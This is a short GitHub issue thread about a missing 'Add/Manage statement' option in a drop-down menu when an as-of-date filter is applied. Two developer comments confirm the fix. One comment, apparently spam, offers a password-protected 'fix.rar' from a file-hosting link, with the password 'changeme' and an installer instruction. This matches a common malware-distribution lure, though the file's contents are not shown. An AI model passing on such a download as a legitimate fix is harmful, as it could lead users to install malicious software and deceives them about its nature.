### ISSUE TITLE
Add/Manage statement missing from drop down in case of as of date filter

### ISSUE THREAD

**Issue by saniatg** [the-canonizer/Canonizer-Beta--Issue-Tracking#1157]
![Screenshot 2024-08-27 at 8 18 18 PM](https://github.com/user-attachments/assets/3badd75e-d38e-44d3-983b-835413af7bce)

On camp history page click on view this version

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rupalichavan9860** [comment]
Add Statement is now visible

**Comment by rupalichavan9860** [comment]
Verified on live
